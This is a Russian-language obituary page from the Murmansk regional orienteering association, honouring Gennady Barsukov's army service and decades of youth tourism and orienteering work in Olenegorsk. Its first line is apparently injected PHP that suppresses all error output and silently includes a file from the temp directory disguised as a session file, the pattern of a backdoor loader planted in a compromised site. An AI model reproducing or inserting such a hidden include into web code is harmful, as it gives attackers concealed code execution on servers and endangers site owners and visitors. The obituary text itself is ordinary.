error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?> Барсуков Геннадий Григорьевич

Барсуков Геннадий Григорьевич


Барсуков  Геннадий Григорьевич


Президиум Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области» с глубоким прискорбием сообщает, что 27 сентября 2014 года на 88-м году ушёл из жизни Барсуков Геннадий Григорьевич.


Геннадий Григорьевич внёс большой вклад в развитие спортивного ориентирования в Мурманской области. В учреждениях дополнительного образования детей города Оленегорска он работал более 20 лет – с 1987 по 2010 год. Мастер спорта СССР по туризму и инструктор по велосипедному туризму Барсуков Г. Г. в 1987 году был принят на работу в Дом пионеров в качестве руководителя кружков туризма и спортивного ориентирования. Работая методистом по туристско-краеведческой работе, Геннадий Григорьевич выступил организатором проведения 29 октября 1989 года самых первых городских соревнований учащихся по ориентированию. С тех пор соревнования по спортивному ориентированию бегом и на лыжах в городе Оленегорске стали проводиться ежегодно. Геннадий Григорьевич был организатором этих соревнований, выполнял обязанности начальника дистанции, главного судьи.


По инициативе Барсукова Г. Г. в 1993 году в Оленегорске был создан Центр детско-юношеского туризма и краеведения, директором которого он был назначен. В эти годы он продолжал руководить кружками туризма и спортивного ориентирования, осуществлял разработку программно-методических материалов по туризму и спортивному ориентированию, обеспечивал участие сборных команд города в областных соревнованиях по спортивному ориентированию.


Барсуков Геннадий Григорьевич в период с 1943 по 1960 год проходил службу в Советской Армии, закончил автотракторный факультет военной Академии, получил воинское звание подполковник. Он награждён медалями «За боевые заслуги», «За победу над Германией в Великой Отечественной войне 1941 – 1945 гг.», юбилейными медалями и медалью «Ветеран труда».


За высокий профессионализм, успехи в обучении и воспитании учащихся Геннадий Григорьевич был награждён Почётной грамотой Комитета по образованию Мурманской области, Почётной грамотой Губернатора Мурманской области, Почётной грамотой Министерства образования и науки Российской Федерации.


В 2013 году в связи с 50-летием спортивного ориентирования в России Геннадию Григорьевичу было вручено Благодарственное письмо Губернатора Мурманской области за многолетнюю плодотворную деятельность по развитию спортивного ориентирования в Мурманской области, значимый вклад в развитие массового спорта, пропаганду здорового образа жизни.


Светлая память о добром человеке, замечательном труженике Геннадии Григорьевиче Барсукове сохранится в сердцах его учеников и ориентировщиков Мурманской области.

Яндекс.Метрика

Участник рейтинга лучших сайтов Рейтинг@Mail.ru

Рейтинг@Mail.ru

По всем вопросам обращайтесь по email: orient-murman.ru@mail.ru

© 2010 Спортивное ориентирование в Мурманской области. Все права защищены.
Вы здесь : Home